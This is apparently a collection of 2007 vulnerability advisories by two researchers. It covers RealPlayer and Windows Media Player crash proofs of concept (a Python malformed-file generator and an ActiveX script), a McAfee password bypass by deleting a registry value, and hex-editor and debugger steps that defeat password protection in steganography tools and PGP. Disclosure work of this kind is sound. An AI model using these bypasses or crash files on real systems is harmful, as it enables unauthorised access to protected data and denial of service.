Realplayer 11 DOS attack when processing a malformed AU file on MS Vista and XP

[thesinoda]

Type : DOS attack when processing a malformed AU file.

Affected : Realplayer 11 ActiveX on Win Vista and Win XP SP2

Date : 01-12-2007  

Author : Adonis, Abed safehack.com 

Link : http://www.safehack.com/Advisory/realpdos_au.txt



Disclaimer

--

The information in this text is believed to be true based on 

experiments though it may be false.

This material is presented for informational purposes ONLY.

We do not accept any liability for anything anyone does with this

Information.


Brief History

-

Link : http://www.safehack.com/Advisory/realpdos_au.txt

RealPlayer 11 is prone to a denial-of-service vulnerability when

processing a malformed AU file.


A remote attacker can exploit this issue to crash the affected

application, denying service to legitimate users.



The Problem

---

Instructions: :

  :

630A87D5   894E 76  MOV DWORD PTR DS:[ESI+76],ECX :

630A87D8   1BDB SBB EBX,EBX   :

630A87DA   83E3 03  AND EBX,3 :

630A87DD   83C3 08  ADD EBX,8 :

630A87E0   0FAFFB   IMUL EDI,EBX  :

630A87E3   D1E7 SHL EDI,1 :

630A87E5   33D2 XOR EDX,EDX   :

630A87E7   F7F7 DIV EDI  <- division by zero, crash   :

  :

  :

Registers::

  :

EAX 

ECX 

EDX 

EBX 000B

ESP 07F5FE14

EBP 07F5FE24

ESI 01DE0E48

EDI 

EIP 630A87E7 pnen3260.630A87E7



Hex Dump:


00411000  00 00 00 00 9C CF 40 00  [EMAIL PROTECTED]

00411008  90 D3 40 00 A0 D3 40 00  [EMAIL PROTECTED] [EMAIL PROTECTED]

00411010  C0 D3 40 00 E0 D3 40 00  [EMAIL PROTECTED]@.

00411018  00 D4 40 00 10 D4 40 00  [EMAIL PROTECTED]@.

00411020  00 00 00 00 00 00 00 00  

00411028  00 00 00 00 00 00 00 00  



-:P.O.C.:-

+-

#RealPlayer 11 local/remote DoS by A.Sawan aka NtWaK0 and A.Hariri aka nophie


import sys

import os


head = 

("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"+

"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"+ 

"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"+   

"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+

"\x00\x00\x00\x00\x00\x00\x00\x00\x66\x66\x66\x00")


print "[x] Windows Media Player 11 DoS by Adonis a.K.a NtWaK0 and Abed aka 
Nophie."


try:

   f = open("test.au",'w')

except IOError, e:

print "Unable to open file ", e

sys.exit(0)


print "[x] File sucessfully opened for writing."

try:

   f.write(head)

except IOError, e:

print "Unable to write to file ", e

sys.exit(0)

print "[x] File successfully written."

f.close()

print "[x] Open test.au with RealPlayer 11."




+-.

Peace to you all:all and Happy New Year full of health and Peace  :

+-.

DOS in Realplayer 11 ActiveX on Win Vista and Win XP SP2

[thesinoda]

+-.

Affected: Realplayer 11 ActiveX on Win Vista and Win XP SP2   :

Type: DOS Attack  :

Date: 28-11-2007  :

Author  : Adonis, Abed:

Link: http://www.safehack.com/Advisory/realpdos.txt   :

+-.

  :


+-.   :

 Brief History \  :

+---`-.

GetSourceTransport() fails to handle exceptional conditions, which:

leads to a DoS (Denial of Service) attack.:

  :

GetSourceTransport() is found in rmoc3260.dll which is installed  : 

with RealPlayer 11.   :

  :

Note: This ActiveX can be loaded by IE or any other browser.  : 

  :

Successful exploitation will lead to a remote crash in IE 6/7.:

  :

+---. :

 The Problem \:

+-`---.

RealPlayer 11 ActiveX DoS Proof-of-Concept:

  :

  :

-:PoC:-   :

1- Copy and past the following code into filepoc.wsf  : 

2- Run it by double clicking on it:

---snip---:










targetFile = "C:\Windows\system32\rmoc3260.dll"

prototype  = "Function GetSourceTransport ( ByVal nSourceNum As Integer ) As 
String"

memberName = "GetSourceTransport"

progid = "RealAudioObjects.RealAudio"

argCount   = 1


arg1=32767


target.GetSourceTransport arg1 




---snip---:


Registers:

--

EIP 637F4A02 -> 

EAX 0022EC44 -> 

EBX 663CCB38 -> 663B7400 -> Uni: t;ft;f

ECX 0022EC44 -> 

EDX 01536388 -> 638416B8

EDI 

ESI 

EBP 0022EC68 -> 0022EC78

ESP 0022EC3C -> 


Block Disassembly: 

--

637F49F2JE SHORT 637F49F8

637F49F4MOV ESI,EAX

637F49F6JMP SHORT 637F49FA

637F49F8XOR ESI,ESI

637F49FALEA ECX,[EBP-24]

637F49FDCALL 6381C1F0

637F4A02MOV EDX,[ESI] <--- CRASH

637F4A04LEA EAX,[EBP-4]

637F4A07PUSH EAX

637F4A08PUSH 638427D8

637F4A0DPUSH ESI

637F4A0ECALL [EDX]

637F4A10MOV EAX,[EBP+8]

637F4A13SUB EAX,46

637F4A16JE 637F4B28


Stack Dump:

--

22EC3C 00 00 00 00 F4 EC 22 00 00 00 00 00 F4 EC 22 07  []

22EC4C C0 6D 53 01 00 00 00 00 30 ED 22 00 00 00 00 00  [.mS.]

22EC5C 00 00 00 00 DC 9A 2B 00 00 00 00 00 78 EC 22 00  []

22EC6C A8 C7 7F 63 47 00 00 00 FF 7F 00 00 90 EC 22 00  [...cG...]

22EC7C 8E 48 3B 66 88 63 53 01 47 00 00 00 FF 7F 00 00  [.H.f.cS.G...]

  :

  :

Peace to you all:all and Happy New Year full of health and Peace  :

+-.

DoS in Microsoft Media Player 11 on Win XP SP2

[thesinoda]

.---.
   / Advisory\
-.
 :
Affected : Microsoft Media Player 11 on Win XP SP2   :
Type : DIVISION by ZERO  :
Result   : DoS   :
Remote   : YES   :
Date : 2007-08-07:
Author:  : Adonis, Abed  :
url  : http://www.safehack.com/exp/mp/mplayer11.txt  :
-.

.
 Disclaimer  \
--`--.
This material is presented for informational and educational :
purposes only. We do not accept any liability for anything anyone:
does with this information. So, don't shoot the messenger.   :
 :
Use a computer in a ways that ensure respect for your fellow.:
-.

--.
 Brief History \
`.
A division by Zero lead to a denial of service on:
Microsoft Windows Media Player version 11:
 :
If you open a specially crafted .au file in windows Media player :
you will crash the player with the following error.  :
 :
Exception number: c094 (divide by zero)  :
 :
To see if you Windows Media Player is vulnerable you can use our :
.au generator coded in python, or you can download the POC file. :
 :
 :
Proof-of-Concept :
 :
 :
http://www.safehack.com/exp/mp/iapetus.py (python .au generator) :
http://www.safehack.com/exp/mp/iapetus.au (poc file) :
 :
If you do not have python installed you can just use the poc file:
-.

--.
 DEBUG DUMP\
`.

Application exception occurred:
App: C:\Program Files\Windows Media Player\wmplayer.exe (pid=4972)
When: 8/7/2007 - 19:50:13.051
Exception number: c094 (divide by zero)

*> System Information <*
Computer Name: --
User Name: --
Terminal Session Id: 0
Number of Processors: 1
Processor Type: x86 Family 15 Model 2 Stepping 4
Windows Version: 5.1
Current Build: 2600
Service Pack: 2
Current Type: Uniprocessor Free
Registered Organization: Organization
Registered Owner: Name



*> State Dump for Thread Id 0x838 <*

eax= ebx=010a82b0 ecx= edx= esi= edi=000fe3a2
eip=748fe598 esp=01c8f0c0 ebp=01c8f154 iopl=0 nv up ei pl zr na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs= efl=0246

function: quartz
748fe581 b708 mov bh,0x8
748fe583 c1ea02   shr edx,0x2
748fe586 3bd1 cmp edx,ecx
748fe588 7702 ja  quartz+0xee58c (748fe58c)
748fe58a 8bd1 mov edx,ecx
748fe58c 0fb708   movzx   ecx,word ptr [eax]
748fe58f 56   pushesi
748fe590 8d740aff lea esi,[edx+ecx-0x1]
748fe594 8bc6 mov eax,esi
748fe596 33d2 xor edx,edx
FAULT ->748fe598 f7f1 div ecx<- FAULT
748fe59a 8bc6 mov eax,esi
748fe59c 5e   pop esi
748fe59d 2bc2 sub eax,edx
748fe59f c3   ret
748fe5a0 90   nop
748fe5a1 90   nop
748fe5a2 90   nop
748fe5a3 90   nop
748fe5a4 90   nop
748fe5a5 8bff mov edi,edi


-.
 The Solution \
---`-.
 :
Wait for a patch from Microsoft  :
--

Bypassing Mcafee Entreprise Password Protection

[thesinoda]

Date : 03/16/2007

URL: 
http://homepage.mac.com/adonismac/Advisory/bypass_mcafee_entreprise_password.html

 
Affected Product / OS
=
Product Name and Version: McAfee VirusScan Entreprise 8.5.0.i maybe older 
version too.

Tested on OS: Windows XP, 2003

Bug Type

Type: Bad Design
 
Bug Results
===
Bypass Password Protection

Bug Description
===
Mcafee virusscan Enterprise version allow you to lock the user interface using 
a password. A user write access windows registry.

The password is saved in UIP under the key 
HKEY_LOCAL_MACHINE\SOFTWARE\McAfee\DesktopProtection

Or it can be under

HKEY_LOCAL_MACHINE\SOFTWARE\Network Associates\TVD\VirusScan 
Entreprise\CurrentVersion


If you remove the value of the UIP you will end up bypassing the password.


You can replace the value if you wish too with a known value, but why bother 
when you can remove the password.
I think this type of protection is not too secure. 


Proof-Of-Concept

http://homepage.mac.com/adonismac/Advisory/crack_mcafee_password_protection.html


Peace to you all

A Major design Bug in Camouflage 1.2.1 (latest)

[thesinoda]

A Major design Bug in Camouflage 1.2.1 (latest)

Direct Link: http://homepage.mac.com/adonismac/Advisory/steg/camouflage.html

Disclaimer
==
This material is presented for informational purposes ONLY. I do not condone or 
encourage vandalism or theft.

I do not accept any liability for anything anyone does with this information. 
So, don't shoot the messenger.
Remember: Use a computer in ways that ensure respect for your fellows.


Author
==
Adonis a.K.a. NtWaK0
Abed a.K.a. NoPh0BiA

 
Affected Product

Camouflage 1.2.1 (latest).
http://camouflage.unfiction.com/


Bug Type and Date
=
Type: Very Bad Design
Date: 01/07/2007


Bug Results
===
Cracking encrypted (Camouflage 1.2.1) files without any bruteforce.

WHY LOSING TIME ON MATH AND BRUTEFORCE WHEN YOU CAN PLAY WITH YOUR HEX EDITOR 
:-).


Bug Description
===
Firstly, computer forensic investigators can take advantage of this bug to 
access file protected with (Camouflage 1.2.1) without the knowledge of the 
original password. Now it is time to check your cold cases for steganography 
files.

You can crack (Camouflage 1.2.1) encrypted files very easy, in fact in less 
than two minute. The problem is similar to the bug I found in PGP last year.


(Camouflage 1.2.1) leave a footprint after you stag a file.
If you look at the end of your stagged file you will notice the following:
http://homepage.mac.com/adonismac/Advisory/steg/camouf3.jpg
 
So now we have identified the stagged file our next step is to access the 
HIDDEN messages or files without cracking the password, here is how.


Proof-of-Concept (THIS WILL WORK HIDDEN FILES)
==
For screen capture please check 
http://homepage.mac.com/adonismac/Advisory/steg/camouflage.html

Step 01

   1. We use a file cover (carrier file) called "Adonis_Carrier_File1.jpg"
   2. We will hide inside it a file called "Adonis_Hidden_File1.txt"
   3. We will right click "Adonis_Hidden_File1.txt" and select camouflage
   4. We will use a password ""
   5. We generated the stagged file we will call it 
"Adonis_Camouflage_Stagged_File.jpg"

http://homepage.mac.com/adonismac/Advisory/steg/camouf1.jpg


Step02

NOTE: We will use different carrier and different input file to show you it 
will work even if you have different input and different carriers.

To access the hidden file WITHOUT the original password "" we will do the 
followings:

   1. We use a file cover (carrier file) called "Adonis_Carrier_File2.jpg"
   2. We will hide inside it a file called "Adonis_Hidden_File2.txt"
   3. We will right click "Adonis_Hidden_File2.txt" and select camouflage
   4. We will use a password "a"
   5. We generated the stagged file we will call it 
"Adonis_break_camouflage.jpg"
   6. We will open Both pictures in a hex editor
   7. We will replace as indicated in the screen capture below 
"Adonis_Camouflage_Stagged_File.jpg" with the one from 
"Adonis_break_camouflage.jpg"
   8. We will Save the file.
   9. We will right click "Adonis_Camouflage_Stagged_File.jpg" and select 
camouflage and use "a" as password. YES we overwrite the password with 
something we know.

Simple hein !!!


Now time to break camouflage.
=
We will open "Adonis_Camouflage_Stagged_File.jpg" and 
"Adonis_break_camouflage.jpg" in hex edit. We will start from the END of the 
file and try to locate 00 02 63 (like 10 lines from the end of the file).

Once we have located the values we start REPLACING from LEFT to right starting 
after 00 20 63 (63 is the first letter of the password a) (Do not replace 63 it 
is your password = a).

In this example I will replace the password  with a. So I will replace F4 
1B 43 with 20 20 20.

http://homepage.mac.com/adonismac/Advisory/steg/camouf2.jpg

To resume the password is saved starting from 00 00 20 00 (ANYTHING AFTER THIS 
POINT IS THE PASSWORD AND THIS CAN BE OVERWRITTEN AS YOU SEE)

 
Testing the results
===
http://homepage.mac.com/adonismac/Advisory/steg/camouflage.html
 

Peace to you all
 
 
Copyright © 2007 Adonis a.K.a NtWaK0

A Major design Bug in Steganography 1.7.x, 1.8 (latest) (Updated Version)

[thesinoda]

Direct Link 
http://homepage.mac.com/adonismac/Advisory/steg/steganography.html

A Major design Bug in Steganography 1.7.x, 1.8 (latest)
 
Disclaimer
==
This material is presented for informational purposes ONLY. I do not condone or 
encourage vandalism or theft.
I do not accept any liability for anything anyone does with this information. 
So, don't shoot the messenger.

Remember: Use a computer in ways that ensure respect for your fellows.

 
Author
==
Adonis a.K.a. NtWaK0
Abed a.K.a. NoPh0BiA

Affected Product

Steganography 1.7.1 and 1.8 (latest).
http://www.securekit.com/hidefiles.htm

Bug Type and Date
=
Type: Very Bad Design
Date: 01/07/2007


Bug Results
===
Cracking encrypted (steganography application 1.7.x 1.8) files without any 
bruteforce.

WHY LOSING TIME ON MATH AND BRUTEFORCE WHEN YOU CAN PLAY WITH YOUR HEX EDITOR 
:-).

 
Bug Description
===
Firstly, computer forensic investigators can take advantage of this bug to 
access file protected with (steganography application 1.7.x 1.8) without the 
knowledge of the original password. Now it is time to check your cold cases for 
steganography files.

You can crack (steganography application 1.7.x 1.8) encrypted files very easy, 
in fact in less than two minute. The problem is similar to the bug I found in 
PGP last year.

(steganography application 1.7.x 1.8) leave a footprint after you stag a file. 
If you look at the end of your stagged file you will notice it will end with 30 
00 0X FF FF. So a simple HEX search will reveal all stagged files.

So now we have identified the stagged file our next step is to access the 
HIDDEN messages or files without cracking the password, here is how.


Proof-of-Concept (THIS WILL WORK ON HIDDEN MESSAGES and HIDDEN FILES)
=
For screen capture please check 
http://homepage.mac.com/adonismac/Advisory/steg/steganography.html

Step 01
   1. We use a file cover (carrier file) called "picture_original.jpg"
   2. We will hide inside it a message "Hello Adonis"
   3. We will use a password "aa"
   4. We generated the steged file we will call it "picture_with_hidden_msg.jpg"

Step02

To access the hidden message WITHOUT the original password "aa" we will do 
the followings:
   1. We will use any other picture file say "mypicture.jpg"
   2. We will hide inside it a message "WHATEVER"
   3. We will use a password "a"
   4. We generate the steged file we will call it "mypicture_steg.jpg"
   5. We will open Both pictures in a hex editor
   6. We will replace the last 20 bites of " picture_with_hidden_msg.jpg" with 
the one from mypicture_steg.jpg
   7. We will Save the picture "picture_with_hidden_msg.jpg"
   8. We will open "picture_with_hidden_msg.jpg" with (steganography 
application 1.7.x 1.8) using "a" as password. YES we overwrite the password 
with something we know.


Simple hein !!!






Peace to you all
 
Copyright © 2007 Adonis a.K.a NtWaK0

Cracking Steganography Application in less than ONE minute

[thesinoda]

Good day

Direct Link to Advisory
http://homepage.mac.com/adonismac/Advisory/steg/steganography.html

Affected Product

Steganography 1.7.1 and 1.8 (latest). http://www.securekit.com/hidefiles.htm


Bug Type and Date
=
Type: Bad Design
Date: 01/06/2007

Bug Results
===
Cracking encrypted steganorgaphy files without any bruteforce.

Bug Description
===
You can crack steganography encrypted files very easy in fact in less than one 
minute. The problem is similar to the bug I found in PGP last year.


First you have to identify the steged files. Steganography application leave a 
footprint after you stego a file.

If you look at the end of your steged file you will notice it will end with 30 
00 02 FF FF. So a simple HEX search will reveal all steged files. 

So now we have identified the steged, the next step is to access the HIDDEN 
message without cracking the password. Here is how
 

Proof-of-Concept


Step 01

1- We use a file cover (carrier file) called "picture_original.jpg"

2- We will hide inside it a message "Hello Adonis"

3- We will use a password "aa"

4- We generated the steged file we will call it "picture_with_hidden_msg.jpg"
 

Step02
==
To access the hidden message WITHOUT the original password "aa" we will do 
the followings:

1- We will use any other picture file say "mypicture.jpg"

2- We will hide inside it a message "WHATEVER"

3- We will use a password "a"

4- We generate the steged file we will call it "mypicture_steg.jpg"

5- We will open Both pictures in a hex editor

6- We will replace the last 20 bites of " picture_with_hidden_msg.jpg" with the 
one from mypicture_steg.jpg

7- Save picture "picture_with_hidden_msg.jpg"

8- Open it using a as password. YES we overwrite the password with something we 
know.


Simple hein !!!


Peace

RE: A Nasty Security Bug that affect PGP Virtual Disks & PGP SDA , PGP 8.x & 9.x and Truecrypt.

[thesinoda]

Firstly, we appricate truecrypt team comments but on the other hand we do not 
agree on some.


--Adonis Comment--

I do not agree with some of truecrypt comments specially the quoted text below.


What if you had  created a virtual disk  and give that to  someone. That someone

use it as his/her own disk and  decided to change the password because they  own

the disk  now (You  give them  to them  with the  pass). So  they did change the

passowrd, but the originator  can still access that  disk if he/she replace  the

passphrase  bytes in  the binary  file. So  I consider  this an  attack on  data

INTEGRITY and  data AVAILABILITY since the legitimate user will be denied access

to the disk after replacing the passphrase bytes.


-- End Comment--




"In conclusion, this is not a "security bug", but design/feature. Also,

to exploit the design, the adversary would have to know your password

first (or have your keyfiles). That means, for example, that he would

capture it using a keystroke logger. If that was the case, then all

security would be practically lost on that machine."




Peace

Proof of concept that PGP AUTHENTICATION CAN BE BYPASSED WITHOUT PATCHING

[thesinoda]

This to answer Mr Jon Callas (PGP CTO) and to show him the last 
proof-of-concept. If he did not get it we consider we have done our part to 
report a BIG problem in PGP unless this is some kinda of HIDDEN features.


--Adonis, Abed Comments--

We do not agree with some of PGP comments. 


We do not know why they just see one side of the coin.


What if you had  created a virtual disk  and give that to  someone. That someone

use it as his/her own disk and  decided to change the password because they  own

the disk  now (You  give them  to them  with the  pass). So  they did change the

passowrd, but the originator  can still access that  disk if he/she replace  the

passphrase  bytes in  the binary  file. So  I consider  this an  attack on  data

INTEGRITY and  data AVAILABILITY since the legitimate user will be denied access

to the disk after replacing the passphrase bytes.


"why you do not want to see that your password verification can be simply 

bypassed, besides a reputable co. like PGP should at least put anti-debugging 

tweaks, or even encrypt/hide the passphrase location"


To pgp, your authentication can be bypassed, even if you have created two

different .sda file with two different content. the authentication can be

overwritten and the file can be extracted if you use a debugger if you do not

use a debugger you will be able to just bypass the authentication but without

extraction. why don't you see that mr. jon? instead of bitching and stuff? why

cannot you be professional and just explain fact after you do your home work

with a nice debugger.? is that to much asking, I think we are talking among

human and adults no?.


We think Mr. Jon (PGP) should play this flash video SLOW REAL SLOW.


http://www.safehack.com/Advisory/pgp/answerjon.html


PGP comments: http://www.securityfocus.com/archive/1/435155 


Quote from Mr Jon comments: "For completeness, I'll note that we are discussing

whether we should add in a warning dialog to the passphrase change on a PGP

Disk, to tell the user that an attacker who has learned an old passphrase, has

an old disk and a hex editor can patch the disk so that it can be opened. On the

one hand, this might be a good thing to do". 


So if Mr Jon does not see the problem why they are talking about adding a

message box?. Why the passphrase location is not hidden? etc. I still see this

as INTEGRITY and AVAILABILITY attacks on PGP. I do not think it is normal

behavior of an encryption application to reveal it is passphrase location and I

do not see bypassing the passphrase dialog-box as Feature either.


 


Proof of concept that PGP AUTHENTICATION CAN BE BYPASSED WITHOUT PATCHING THE 

BINARY FILE EVEN.


This Flash video is dedicated to Mr. Jon Callas (PGP CTO, CSO).

http://www.safehack.com/Advisory/pgp/proof_of_concept_PGP_Authentication_BYPASS.html

http://www.safehack.com/Advisory/pgp/proof_of_concept_PGP_Authentication_BYPASS.html


We had reported that PGP Authentication can be bypassed by patching the binary 

file. After reading Mr. Jon Callas NON PROFESSIONAL answer, me and abed decided 

to show him that is not true. By using a SIMPLE Debugger PGP Authentication can 

be bypassed.


Here is Mr Jon Callas Comments http://www.securityfocus.com/archive/1/435155 

Summing up, we are disappointed that for whatever reasons, we were not 
contacted 

about this research before it was put on the web and posted on bugtraq. Had we 

been contacted, we could discuss this in private rather than have to air the 

details of this misunderstanding in a public forum. I am truly sorry for the 

sake of the Information Security Institute of Quebec and its staff that this 

complex issue has turned into a public brouhaha.


We load the file in the debugger and set the break points then we start by 

hitting F9 we will see the password dialog we enter ANY password here. When it 

stop at 00409797 Hit F9 6 times You see 


on 00405D70 |. E8 4FFB CALL a_sda.004058C4

we hit 6 times F9

A break point should be set on 00405D70 to see this.


After running the sda in olly we end up here. We hit F9 couples of time then we 
change ESI EDI

ON 00409797 |. F3:A7 REPE CMPS DWORD PTR ES:[EDI],DWORD PTR D>; 


We see the stack values

ECX=0002 (decimal 2.)

DS:[ESI]=stack [00BBF68C]=DC3F5C82 <-- IF WE ENTER A BAD PASSWORD THESE WONT BE 
THE SAME

ES:[EDI]=stack [00BBFF98]=DC3F5C82 EQUAL... WE JUST MAKE THEM EQUAL THEN 
CONTINUE THE QUEST. 


AT THIS POINT PGP Authentication is bypassed.


I hope that help Mr. Jon (PGP) seeing the problem. Again Mr Jon Bitching does 
not help you fixing your products.


-- End Comment--



Peace

A Nasty Security Bug that affect PGP Virtual Disks & PGP SDA , PGP 8.x & 9.x and Truecrypt.

[thesinoda]

A Nasty Security Bug that affect PGP Virtual Disks & PGP SDA , PGP 8.x & 9.x 
and Truecrypt. 


Affected Products:


* PGP 8.x PGP 9.x maybe older version too


* Truecrypt 4.2 maybe older version too


// Full detail can be found here //

<> http://www.safehack.com/Advisory/pgp/PGPcrack.html

<> http://www.safehack.com/Advisory/truecrypt/truecrypt.html


If you would like to watch the flash video check the following links.

<> pgpdiskvideo.html Tested on version 8.1 and the latest 9.02

   http://www.safehack.com/Advisory/pgp/pgpdiskvideo.html


<> truecrypt.html Tested on the latest version truecrypt-4.2.zip

   http://www.safehack.com/Advisory/truecrypt/truecrypt.html

   Note If you put stuff inside your test file you need to use a 

   debugger to extract the data. If you just follow the video you 

   will see how it is done without a debugger and an empty file.


The How?



I Was able to ACCESS PGP encrypted disks if the disk was encrypted with a 
passphrase or a public Key. This method will work on both scary huh :-)


You need the followings tools:

--

   1. A Brain

   2. A Hex Editor.

   3. PGP 8.1 Entreprise or Personal. You can use 9.x too. My feeling is this 
method will work on older versions too, because it is a design flaw in PGP 
application not in PGP algorithm.

   4. A Debugger. Not needed if you wana backdoor pgp (olldbg)

   

During my tests I have found that PGP virtual DISK and PGP Self Extractable 
file SDA have a SERIOUS security bug. I would rather say a design bug.


PGP disk or SDA can be cracked in 3 major steps:



   1. Editing PGP protected file using a hex editor. (Patching the passphrase).

   2. Tracing PGP protected file using a debugger. (You need a lot of time and 
coding/cracking experience)

   3. Patching the responsible bytes.


I have spend only couples of days debugging but surely a lot more time is 
needed. But once the process is understood it is question of finding the right 
bytes and patching them.


 

Conclusions for 6 days debugging and testing:

=

* PGP Virtual Disk and PGP and PGP SDA has a serious bug. I have tested PGP 
8.1 Entreprise. Other version many be vulnerable too.


* PGP corporation made the same error in PGP 9.x you can bypass the 
passphrase Dialog box same way.


* PGP corporation could avoid this type of issue by calculation the HASH 
for the encrypted file. They should make it harder to locate the passphrase.


* PGP Virtual Disk First Level protection bypass. Passphrase bypass. 
(Working 100%)


* PGP Virtual Disk Backdooring (Working 100%).


* PGP Virtual Disk Mounting / Adding Users / Deleting Users / Re-Encrypting 
Disk (Working 100%).


* PGP Virtual Disk Mounting and Data Access (Working 40%. Need more time to 
debug).


* PGP SDA Passphrase bypass. (Working 100%)


* PGP SDA Extraction is possible IF the input file is the same (Working 
100% Patching using a Debugger)


* PGP SDA Extraction is possible of any file (Working 80%. Need more time 
to debug)


* OTHER AFFECT PRODUCTS:

  o iOPUS Secure Email Attachments (SEA) V1.0

  o Truecrypt Free open-source disk encryption software 4.2


* WINZIP was not affected. 1- In winzip you do not know where is the 
password location 2- If you change one bit your file wont work


* I DO NOT HAVE more time to test, but I am sure many smart dudes out their 
would love to play some more.


* To do: Build an application to mount PGP Virtual disk using this bug.


* To do: Build an application to extract PGP SDA files using this bug.


After spending 6 days on this I had decided to stop. But I will be doing more 
testing when I have some free time. You are free to do your own tests. If you 
wish to share your own test or finding with me please feel free to contact me 
at [EMAIL PROTECTED]



 

PGP SDA authentication method

=

Let's say you created a text file and wrote inside it "aa", then created an SDA.

IF you hex edit the output exe, you will notice at the very buttom of the file 
some bytes seperated by 803E.

Ex:


E7 93 A0 90 E9 62 D1 21

803E

A1 50 AF 5F 6F 9E FE D6


Analysing the bytes carefully, you will notice that 803E is the value used for 
a loop. The loop starts at 0040590D. Further analysis showed that the bytes 
right before 803E, are used for extraction and authentication. Authentication 
is done in the following way:


When some enters a passphrase a series of instructions is executed against the 
bytes right before 803E, to be exact in the function at address 00404E8F. This 
function generates a series of bytes which are compared later on to the bytes 
AFTER 803E. If they match you are granted auth.


The auth. byte comarison is done in the following instruction:

00409797 |. F3:A7 REPE CMPS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI